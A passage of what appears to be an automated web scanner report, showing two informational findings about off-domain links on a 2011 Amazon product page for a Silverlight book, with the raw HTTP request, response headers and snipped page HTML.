<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

22.372. http://www.amazon.com/gp/product/0672333368

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /gp/product/0672333368

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /gp/product/0672333368?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=0672333368 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:29:33 GMT
Server: Server
x-amz-id-1: 04VBMFPBJXZ8J962J8W2
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: fH3WLv3Jzmox2K4JTSORqyP3dG78f8/Z57/rsvJ+e57X3LhuWxe1LUoVMzwVuNdD
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=185-0119564-6236271; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=Oel7bYwRWS1gKV5RSiNZiK5lZAAokMgjRBrE5HDUyc9ir04+EELG8B5ZvPf93p6q/Wug8LCjECLDGs1NV2Ss5CncqyEhzH4Xx7dc9WlLyukc31H5gDwd1M0N2+5dFhG9r9UQX7bBDo1UvRUWe9CKYp29GbQIzzh4/e34AfsAPvBx1HVvihnL6R0of1OO3HpDP4AGMQXekYYMU4xOPcaCZk0VUxYwQP/RumeAVnei2D4rad8Xugnf2lk0nqBj3rkP6vzCnoFEzmbe3GgDLzEstwODPn9gW6oauV3yNspeqzecQNyMXmsDy/UrRjAUYndEw91zCgoaiXhnp39HquunCVQJJv/M/EGP7xhqBuRl49vBAGLgp8yRAJwJEgmd86mQGKHoS1Ku4VfxXIMdaRhhkLOtFXZRjef7VWDgVqemNz4+2YF2kiCxAGs6W/ltnCEp33kcaW9Sa6E=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:33 2011 GMT
Content-Length: 386121


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...
</style>


                <link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css" />


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css" />


<noscript><link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" /></noscript>

<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css"/>


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css" />


   <link rel="stylesheet" type="text/css" href=http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css />

<style type="text/css">
...[SNIP]...
</style>


<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5869551106.css._V171084207_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css' rel='stylesheet'>
<style type="text/css">
...[SNIP]...
</title>

<link title="Amazon Search Suggestions" rel="search" type="application/opensearchdescription+xml" href="http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml">


<!--[if IE]>
...[SNIP]...
</script>
<img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16piv._V172849515_.png" style="display:none" alt=""/>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" style="display:none" alt=""/>


<!--Pilu -->
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/41QizTXOm1L._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" style="display:none;"/>
</div>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableTop"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="subsDPTableLeft"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td class="subsDPTableRight"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableBottom"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="bottomLeft">
<img src="http://g-ecx.images-amazon.com/images/G/01/kindle/cascade/read-first-chapter-free._V201174422_.png" id="kindleReaderSampleButton" style="cursor:pointer"/>
</td>
...[SNIP]...
<a href="https://www.amazon.com/gp/tradein/add-to-cart.html/ref=trade_new_dp_trade_btn?ie=UTF8&asin=0672333368"><img src="http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif" width="84" align="absmiddle" height="17" border="0" /></a>
...[SNIP]...
<a href="/gp/reader/0672333368/ref=sib_dp_pt#reader-link" onclick="if (typeof(SitbReader) != 'undefined') { SitbReader.LightboxActions.openReader('sib_dp_pt'); return false; }"><img onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/41QizTXOm1L._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" id="prodImage" width="300" height="300" onMouseOver="sitb_showLayer('bookpopover'); return false;" onMouseOut="sitb_doHide('bookpopover'); return false;" border="0" alt="Silverlight 4 Unleashed" onmouseover="" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Unleashed-Laurent-Bugnion/dp/0672333368/ref=pd_bxgy_b_img_a"><img src="http://ecx.images-amazon.com/images/I/41QizTXOm1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="75" alt="Silverlight 4 Unleashed" id="bxgy_img_a" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Action-Pete-Brown/dp/1935182374/ref=pd_bxgy_b_img_b"><img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Silverlight 4 in Action" id="bxgy_img_b" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Pro-Silverlight-4-Matthew-MacDonald/dp/1430229799/ref=pd_bxgy_b_img_c"><img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Pro Silverlight 4 in C#" id="bxgy_img_c" height="75" border="0" /></a>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51lFeW7HogL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41qFjxWqMpL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/512N51%2BQbGL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41d0pgdYWpL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading&hellip;" height="14" border="0" /></div>
...[SNIP]...
<noscript>
<link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" />
</noscript>
...[SNIP]...
</div>

<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />

<br />
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<div class="s9DpEntity" id="s9DpEntity" style="height: 200px;"><img style='padding-left: 130px; padding-top: 20px;' src='http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif' alt='loading' /><noscript>
...[SNIP]...
<td valign="top" class="faceout"><img src="http://ecx.images-amazon.com/images/I/41QizTXOm1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="50" alt="Silverlight 4 Unleashed" height="50" border="0" /></td>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Action-Pete-Brown/dp/1935182374/ref=pd_cp_b_1_img" id="pd_cp_b_1_img_1935182374" ><img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Silverlight 4 in Action" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Pro-Silverlight-4-Matthew-MacDonald/dp/1430229799/ref=pd_cp_b_2_img" id="pd_cp_b_2_img_1430229799" ><img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Pro Silverlight 4 in C#" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/WPF-4-Unleashed-Adam-Nathan/dp/0672331195/ref=pd_cp_b_3_img" id="pd_cp_b_3_img_0672331195" ><img src="http://ecx.images-amazon.com/images/I/41qFjxWqMpL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="WPF 4 Unleashed" height="50" border="0" /></a>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="display:none" width="100%">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif" style="padding:8px 0px 0px 100px" />
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&amp;nodeId=518316">
...[SNIP]...
<td>
           
   
                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />&nbsp;Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?


    <b>
...[SNIP]...
<a href="/ref=footer_logo/185-0119564-6236271"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

22.373. http://www.amazon.com/gp/product/0672333368

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /gp/product/0672333368

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /gp/product/0672333368?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=0672333368 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 15:57:56 GMT
Server: Server
x-amz-id-1: 15QXH1NVPGW2NN4XRB7S
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: 9pLftCB/UzAze59wdUxuUJpLHZ30X813v2HmE/UGkV0lc0gEu8B/fJgGoIgRn5xX
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=180-9241494-4669614; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=qysMAEBxIra9ytEnY6tq2qO8Ud5xhwfttcDZbRVhHKzmR5qh7pMZryFMuXrRO3qkAXIboHqWL5bHizeLWsR5l/AIXplutjhn6T93+1UleTUDo9/YfCszgIzBNTya2BpHrjJegeTQEF+1WCdBzrSK12d2Syp9icw4heM5dldSvGmwy+uK4ZqeYDd6sGcxi6bSdeNYr48M4gq64aJup9jidi2PrPt/dUzYGApqqO2e9H64DICuwigDP8/07tUKImEJ8H4a7GMLlOT285/+KoeEoNL7ruPtvAJl9PsFfkE/zgTLPgvqkCc1jL5oOr65MmStzcgcs4sclU86P7hVSTYeApTOsGGTtkRv1SqHK1nNT/zYpFSc82kHXtM1UazevOXzgXOII+PFzXO+PIpwGvVD7XmAX57+u8ytP8HVuhm9c3wLbfTSTYhRsH+IKuwDtRk+yZv5SiUYZ+k=; path=/; domain=.amazon.com; expires=Sun Feb 06 15:57:56 2011 GMT
Content-Length: 402942


<html>
<head>
<script type='text/javascript'><!--
var t0_date=new Date()
...[SNIP]...
</style>


                <link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css" />


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css" />


<noscript><link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" /></noscript>

<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css"/>


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css" />


   <link rel="stylesheet" type="text/css" href=http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css />

<style type="text/css">
...[SNIP]...
</style>


<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5869551106.css._V171084207_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css' rel='stylesheet'>
<style type="text/css">
...[SNIP]...
</title>

<link title="Amazon Search Suggestions" rel="search" type="application/opensearchdescription+xml" href="http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml">


<!--[if IE]>
...[SNIP]...
</script>
<img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16piv._V172849515_.png" style="display:none" alt=""/>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" style="display:none" alt=""/>


<!--Pilu -->
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/41QizTXOm1L._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" style="display:none;"/>
</div>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableTop"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="subsDPTableLeft"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td class="subsDPTableRight"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableBottom"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="bottomLeft">
<img src="http://g-ecx.images-amazon.com/images/G/01/kindle/cascade/read-first-chapter-free._V201174422_.png" id="kindleReaderSampleButton" style="cursor:pointer"/>
</td>
...[SNIP]...
<a href="/gp/reader/0672333368/ref=sib_dp_pt#reader-link" onclick="if (typeof(SitbReader) != 'undefined') { SitbReader.LightboxActions.openReader('sib_dp_pt'); return false; }"><img onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/41QizTXOm1L._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" id="prodImage" width="300" height="300" onMouseOver="sitb_showLayer('bookpopover'); return false;" onMouseOut="sitb_doHide('bookpopover'); return false;" border="0" alt="Silverlight 4 Unleashed" onmouseover="" /></a>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AHM0uEnsWKPmXWyhXCVB6AgzrVsAkEGVFUJ9EUuGZcnLDmMK1bBWvinnv76Odk5SjcKfdakXST.STW91eoJH6kLl52WL2u.AC.ot0Th58BdS6h6XstwRfn5Kpq-EQ4IkOV9Dmki7neg.dIjrlRWUtVERJKwvV2I10CTu4gTLVi9t7i6QpfzH67JywRlAMQp3QHuv44LNjHrXyVPsPzvVgtkTKTRd2XOLaxzCMVvR0vBLEErUQZfrkinTqE.CFGeU6jlMkY7Xa3hs0N08e3uoB406P8SJDL2naO8RrfTGiy6KBG.3LO.MnWoorkoW4UmybmfQ1IpxQEmgEse-fNo7ufTsMl0IAdLfQR-YTSpkC1S56oxTU5DDkC8R7EZD00wosRkIi.A4ldKmTWYy-89Ro6Co6ZSHP2uwmSoOw.lpH4-lVwqWPsERuObhp9IYO6geg0D70BqaPgZv9zWnYdJC4M5mG8XsK275BFnXsHl7nst0DGD27is7s.jntW62GTqoVzUUXNjxNoX2&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AHM0uEnsWKPmXWyhXCVB6AgzrVsAkEGVFUJ9EUuGZcnLDmMK1bBWvinnv76Odk5SjcKfdakXST.STW91eoJH6kLl52WL2u.AC.ot0Th58BdS6h6XstwRfn5Kpq-EQ4IkOV9Dmki7neg.dIjrlRWUtVERJKwvV2I10CTu4gTLVi9t7i6QpfzH67JywRlAMQp3QHuv44LNjHrXyVPsPzvVgtkTKTRd2XOLaxzCMVvR0vBLEErUQZfrkinTqE.CFGeU6jlMkY7Xa3hs0N08e3uoB406P8SJDL2naO8RrfTGiy6KBG.3LO.MnWoorkoW4UmybmfQ1IpxQEmgEse-fNo7ufTsMl0IAdLfQR-YTSpkC1S56oxTU5DDkC8R7EZD00wosRkIi.A4ldKmTWYy-89Ro6Co6ZSHP2uwmSoOw.lpH4-lVwqWPsERuObhp9IYO6geg0D70BqaPgZv9zWnYdJC4M5mG8XsK275BFnXsHl7nst0DGD27is7s.jntW62GTqoVzUUXNjxNoX2&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AHM0uEnsWKPmXWyhXCVB6AgzrVsAkEGVFUJ9EUuGZcnLDmMK1bBWvinnv76Odk5SjcKfdakXST.STW91eoJH6kLl52WL2u.AC.ot0Th58BdS6h6XstwRfn5Kpq-EQ4IkOV9Dmki7neg.dIjrlRWUtVERJKwvV2I10CTu4gTLVi9t7i6QpfzH67JywRlAMQp3QHuv44LNjHrXyVPsPzvVgtkTKTRd2XOLaxzCMVvR0vBLEErUQZfrkinTqE.CFGeU6jlMkY7Xa3hs0N08e3uoB406P8SJDL2naO8RrfTGiy6KBG.3LO.MnWoorkoW4UmybmfQ1IpxQEmgEse-fNo7ufTsMl0IAdLfQR-YTSpkC1S56oxTU5DDkC8R7EZD00wosRkIi.A4ldKmTWYy-89Ro6Co6ZSHP2uwmSoOw.lpH4-lVwqWPsERuObhp9IYO6geg0D70BqaPgZv9zWnYdJC4M5mG8XsK275BFnXsHl7nst0DGD27is7s.jntW62GTqoVzUUXNjxNoX2&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.accusoft.com/<b>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AILoGohU0wO8YwmMuaJYRC2Ufd6yMMPbRJAlerGEaA2UxVwzNHpOser4-YoUO7Fq7tcF97Lsm8IU6hPyHS09fzfHGnbYLOqBfy38GKqm.BOzGmBXLTg4sdxO5ehtHNxzfjS44.gZHwJTE2BQBHB21ote6l7JSiO3mecB7FDFS3i012jiQJdlXDwp5NJsjjI8qiQUAS26jJ5x2iz.kTuDq53e7rhBeaLYvQ8fB85QIGyJOVMyBC2.PGyutxgNJS2H186yc5N6UlISjfc35d4LD5wbO.Vtt8bgLtcHr7qUKyNkjP-Lc1pMm5kGWLr3XyoG2C1pZAhFklunHab5fIihOQRDIVZPKH.O189eGRB3HcsvnbC6j5oh-U2O78hTYKIfRTfb8PB2n4Fg-qEi0oVpOedY-jGvuIWWdqshc3acpEsX.CkBAUVEMii.6mN7DWgYi-njGSTjRAvCk0Q4mZ6NfdjE0DsE9wOc1WoalYsLS9bkHwdLAgqJfxsEHK0FNJsgWA__&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AILoGohU0wO8YwmMuaJYRC2Ufd6yMMPbRJAlerGEaA2UxVwzNHpOser4-YoUO7Fq7tcF97Lsm8IU6hPyHS09fzfHGnbYLOqBfy38GKqm.BOzGmBXLTg4sdxO5ehtHNxzfjS44.gZHwJTE2BQBHB21ote6l7JSiO3mecB7FDFS3i012jiQJdlXDwp5NJsjjI8qiQUAS26jJ5x2iz.kTuDq53e7rhBeaLYvQ8fB85QIGyJOVMyBC2.PGyutxgNJS2H186yc5N6UlISjfc35d4LD5wbO.Vtt8bgLtcHr7qUKyNkjP-Lc1pMm5kGWLr3XyoG2C1pZAhFklunHab5fIihOQRDIVZPKH.O189eGRB3HcsvnbC6j5oh-U2O78hTYKIfRTfb8PB2n4Fg-qEi0oVpOedY-jGvuIWWdqshc3acpEsX.CkBAUVEMii.6mN7DWgYi-njGSTjRAvCk0Q4mZ6NfdjE0DsE9wOc1WoalYsLS9bkHwdLAgqJfxsEHK0FNJsgWA__&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
